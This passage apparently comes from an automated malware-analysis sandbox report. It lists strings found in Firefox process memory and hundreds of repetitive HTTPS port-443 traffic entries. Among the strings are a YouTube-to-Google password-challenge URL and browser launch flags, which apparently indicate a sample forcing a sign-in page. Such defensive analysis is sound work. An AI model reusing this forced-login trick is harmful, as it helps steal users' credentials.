                          Source: firefox.exe, 00000030.00000003.3209599840.000001E57D581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
                          Source: firefox.exe, 00000030.00000003.3209599840.000001E57D581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                          Source: firefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
                          Source: firefox.exe, 00000030.00000003.3262699316.000001E580667000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com
                          Source: firefox.exe, 0000001A.00000003.2905223915.0000018D771DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/
                          Source: firefox.exe, 00000021.00000002.2921121209.000001F3C36F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/sig
                          Source: firefox.exe, 0000001D.00000002.2912240116.000001C300EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/sig26
                          Source: firefox.exe, 00000030.00000003.3143732764.000001E57D33A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                          Source: firefox.exe, 00000018.00000002.2788434321.0000018DBFDC0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2812962510.0000015CCF57F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2970569302.00000226B3E69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
                          Source: firefox.exe, 0000001D.00000002.2910869374.000001C300AC0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2912240116.000001C300EF4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2921121209.000001F3C36F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2919491987.000001F3C3430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
                          Source: firefox.exe, 0000001D.00000002.2910869374.000001C300AC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdn
                          Source: firefox.exe, 0000001D.00000002.2910869374.000001C300ACA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdz
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50235 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50382 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50301 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50386 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50392 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50344
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50343
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50289 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50362
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50410 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50362 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50309
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50300
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50302
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50301
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50299
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50343 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50400 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50377 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50390 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50255
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50387 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50289
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50375 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50237 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50380 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50402 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50404 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
